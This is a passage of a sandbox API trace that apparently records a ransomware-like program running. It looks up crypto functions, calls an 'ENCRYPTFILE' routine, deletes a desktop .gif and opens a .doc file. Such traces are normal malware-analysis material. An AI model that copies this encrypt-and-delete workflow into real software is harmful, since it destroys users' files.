dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0129.884] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0129.884] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0129.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0129.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0129.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0129.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0129.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0129.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0129.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0129.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0129.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0129.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0129.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0129.885] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0129.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0129.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0129.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0129.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0129.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0129.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0129.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0129.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0129.885] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0129.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0129.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9128 [0129.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad18 [0129.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0129.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0129.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0129.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0129.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0129.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0129.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0129.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0129.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0129.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0129.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0129.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0129.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0129.887] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0129.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0129.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0129.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0129.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0129.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0129.887] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad00 [0129.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0129.887] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0129.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0129.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0129.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0129.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0129.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0129.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0129.888] FreeLibrary (hLibModule=0x756e0000) returned 1 [0129.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0129.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0129.888] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0129.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0129.888] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0129.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0129.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0129.888] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0129.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0129.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0129.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0129.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0129.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0129.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0129.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0129.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac40 [0129.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad78 [0129.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab98 [0129.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0129.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0129.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac28 [0129.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0129.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0129.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0129.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0129.889] CloseHandle (hObject=0x258) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eaa90 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0129.890] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0129.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0129.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0129.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0129.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0129.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0129.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0129.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0129.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab20 [0129.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac40 [0129.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad78 [0129.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0129.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab50 [0129.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad00 [0129.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0129.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0129.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0129.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0129.891] CloseHandle (hObject=0x2a0) returned 1 [0129.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0129.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0129.895] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5N nlGCuCJHLr.gif", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5N nlGCuCJHLr.gif", lpFilePart=0x0) returned 0x36 [0129.895] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5N nlGCuCJHLr.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\5n nlgcucjhlr.gif")) returned 0x20 [0129.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0129.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0129.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0129.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0129.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0129.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0129.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0129.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0129.896] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5N nlGCuCJHLr.gif", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4d3d00, ftCreationTime.dwHighDateTime=0x1d5efef, ftLastAccessTime.dwLowDateTime=0x634a8dc0, ftLastAccessTime.dwHighDateTime=0x1d5e5fb, ftLastWriteTime.dwLowDateTime=0x634a8dc0, ftLastWriteTime.dwHighDateTime=0x1d5e5fb, nFileSizeHigh=0x0, nFileSizeLow=0xf43e, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="5N nlGCuCJHLr.gif", cAlternateFileName="5NNLGC~1.GIF")) returned 0x41ac180 [0129.896] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5N nlGCuCJHLr.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\5n nlgcucjhlr.gif")) returned 1 [0129.968] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4d3d00, ftCreationTime.dwHighDateTime=0x1d5efef, ftLastAccessTime.dwLowDateTime=0x634a8dc0, ftLastAccessTime.dwHighDateTime=0x1d5e5fb, ftLastWriteTime.dwLowDateTime=0x634a8dc0, ftLastWriteTime.dwHighDateTime=0x1d5e5fb, nFileSizeHigh=0x0, nFileSizeLow=0xf43e, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="5N nlGCuCJHLr.gif", cAlternateFileName="5NNLGC~1.GIF")) returned 0 [0129.968] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0129.968] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0129.968] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5qUH.doc", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4afc3bf0, ftCreationTime.dwHighDateTime=0x1d5e6d3, ftLastAccessTime.dwLowDateTime=0x36306f20, ftLastAccessTime.dwHighDateTime=0x1d5f088, ftLastWriteTime.dwLowDateTime=0x36306f20, ftLastWriteTime.dwHighDateTime=0x1d5f088, nFileSizeHigh=0x0, nFileSizeLow=0x2b91, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="5qUH.doc", cAlternateFileName="")) returned 0x41ac640 [0129.969] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0129.969] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0129.969] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0129.969] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0129.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0129.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0129.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0129.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0129.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.969] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae20 [0129.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cae20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0129.970] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5qUH.doc" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\5quh.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0129.970] FreeLibrary (hLibModule=0x772d0000) returned 1 [0129.970] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0129.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0129.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca7a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0129.970] CloseHandle (hObject=0x2a0) returned 1 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0129.970] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0129.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0129.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0129.971] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0129.971] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: 